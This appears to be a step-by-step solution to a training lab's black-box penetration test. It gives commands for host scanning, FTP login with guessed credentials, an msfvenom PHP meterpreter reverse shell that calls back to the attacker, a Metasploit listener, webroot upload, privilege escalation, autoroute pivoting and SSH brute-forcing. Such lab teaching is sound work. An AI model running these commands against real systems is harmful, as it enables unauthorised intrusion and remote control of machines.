Black-box 3

 

  • You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.

  • Some machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information, that will help you proceed further into the environment.

  • If you are stuck on one of the machines, don't overthink and start pentesting another one.

  • When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.

This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.

The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!

Goals

  • Discover and exploit all machines on the network

  • Read all flag files (one per machine)

  • Obtain root privileges on both machines (meterpreter's autoroute functionality and ncrack's minimal.usr list will prove useful)

What you will learn

  • Network discovery

  • Pivoting to other networks

  • Basic privilege escalation

Recommended tools

  • Dirb

  • Metasploit framework (recommended version 5)

  • Nmap

  • FTP Utility

Solutions

Below, you can find solutions for the engagement. Remember though that you can follow your own strategy (which may be different from the one explained below).

Step 1: CONNECT TO THE VPN

Connect to the lab environment using the provided VPN file.

Make sure you received an IP address within the 10.13.37.0/24 range.

Don't worry about the fact that you got an IP within the 10.13.37.0/24 range. The 172.16.37.0/24 range is accessible through a static route.

Step 2: DISCOVER LIVE HOSTS ON THE NETWORK

Using nmap, scan for live hosts on the 172.16.37.0/24 network.

Sort the discovered addresses (exclude your own IP address) and write the rest to a file. This file will be fed to nmap in order to perform a full TCP scan.

Use nmap with following options:

  • -sV for version identification

  • -n for disabling reverse DNS lookup

  • -v for Verbose

  • -Pn to assume host is alive

  • -p- to scan all the ports

  • -T4 to speed things up

  • -iL to use a list of IPs as input (ips.txt)

  • --open to see just open ports and not closed / filtered ones

  • -A for detailed information and running some scripts

nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open

You will come across something similar to the below.

Nmap scan report for 172.16.37.220
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Nmap scan report for 172.16.37.234
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
40121/tcp open ftp ProFTPD 1.3.0a
40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Step 3: INSPECT BOTH HTTP SERVICES

Using dirb against http://172.16.37.234:40180 will result in the http://172.16.37.234:40180/xyz/ directory being discovered. This directory contains the following.

In addition, if we inspect the http://172.16.37.220 page's source code, we will come across the below.

Both the above inform us that there is another network that we are not yet capable of accessing. In order to get into it, we need to compromise one of the machines.

Step 4: INSPECT THE FTP SERVICE ON THE 172.16.37.234 MACHINE

The FTP service on port 40121 has a promising banner. Let's try to log into it using the identified ftpuser username and a password that is the same as the identified username (ftpuser).

ftp 172.16.37.234 40121

Luckily, we identified valid credentials and we are now able to explore the FTP environment.

By issuing basic commands we can identify that the FTP service allows the uploading of files into the webroot. This is a solid attack vector for remote code execution.

Now, we should focus on creating a suitable reverse shell.

Step 5: MAKE THE APPROPRIATE PREPARATIONS TO ESTABLISH A REVERSE SHELL

A possible malware to try on an Apache server could be, for example, a php-based one. Let's generate such a malware using msfvenom, as follows.

msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php

  • lhost is your tap0 IP address

  • lport is the port you would like to listen on. It is recommended that you choose commonly used ports to get around firewall restrictions, instead of trying some exotic or funny ports like 31337 or the most common 4444 port.

  • -o specifies the output file

Note, that this meterpreter-based file should be placed inside the directory from where you run the FTP client. For example, if your meterpreter.php file is on Desktop, then before connecting to the FTP service, make sure that your current working directory is also Desktop.

Before trying to establish a meterpreter session, we should set a Metasploit listener up, as follows.

use exploit/multi/handler
set lhost 10.13.37.4
set payload php/meterpreter_reverse_tcp
set lport 53
run

Step 6: UPLOAD THE METERPRETER-BASED FILE AND OBTAIN A REMOTE ROOT SHELL

Let's go back to the FTP connection. If it has timed out, reconnect by exiting the FTP client and connecting again.

Upload the meterpreter-based file using the "put" command (Do not confuse it with the HTTP PUT verb), as follows. Note the cd html command that ensures you are uploading directly to webroot.

ftp 172.16.37.234 40121
ftpuser
ftpuser
cd html
put meterpreter.php

When uploading is complete, visit the meterpreter-based file through the browser and observe your newly-created meterpreter session being opened. Note, that the page will keep on loading and eventually display a timeout, but this is perfectly okay since all we care about is the server executing our reverse shell payload.

Using the "shell" command, we are presented with a remote terminal. Then, issue the below for a friendlier terminal prompt.

shell

bash -i

By viewing /etc/passwd you notice that ftpuser is, in fact, a privileged system user (uid 0, effectively root).

So the logical thing is to execute the below, to escalate your privileges.

su ftpuser

Enter the password: "ftpuser"- like you did when logging into FTP.

This might fail due to lack of a terminal.

In order to spawn a terminal we can use Python, as follows.

python -c 'import pty;pty.spawn("/bin/bash")';

If we look into the /var/www directory, we'll find the flag there.

Note, that you need root-level privileges to read it.

Step 7: LEVERAGE THE COMPROMISED 172.16.37.234 MACHINE TO CREATE A ROUTE TO THE SECOND NETWORK AND COMPROMISE THE REMAINING 172.16.37.220 MACHINE

Issuing an "nmap" command when inside the 172.16.37.234 machine reveals that nmap is installed. Leverage it to scan the remaining machine using its second IP address (the 172.16.50.222 one, that was identified during the web application reconnaissance phase - Step 3).

An SSH service is running on 172.16.50.222. Background the shell by pressing ctrl + z. When the meterpreter > prompt appears, use meterpreter's autoroute functionality in order to access it. You can do this, as follows.

run autoroute -s 172.16.50.0/24

Step 8: BRUTEFORCE / GUESS SSH CREDENTIALS USING METASPLOIT'S SSH_LOGIN MODULE

Autoroute routes our exploitation attempts through the first compromised machine and enables us to access the remaining machine, through the second network (172.16.50.0/24). As seen above, having access to that network made us capable of identifying and accessing additional services running on the remaining machine.

Let's focus on the SSH one. We can now leverage Metasploit's ssh_login module to guess valid SSH credentials. We can do that as follows.

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run

After a short time, a new Meterpreter session will be opened.

You can switch to the newly opened session, as follows.

sessions -i 3

bash -i

Finally, if you navigate to the home directory (/root), you will come across the flag .flag.txt.

Note, that you will see the flag in the directory contents only after executing ls with the "-la" parameters since it is a hidden file.

STATUS

Lab Not Running

info_outlineLAB NOT RUNNING

Start the lab and you’ll be able to download a VPN File and connect.

Penetration Testing Approach - Study Guide

Career Paths - Study Guide

Comments

Post a Comment

Popular Posts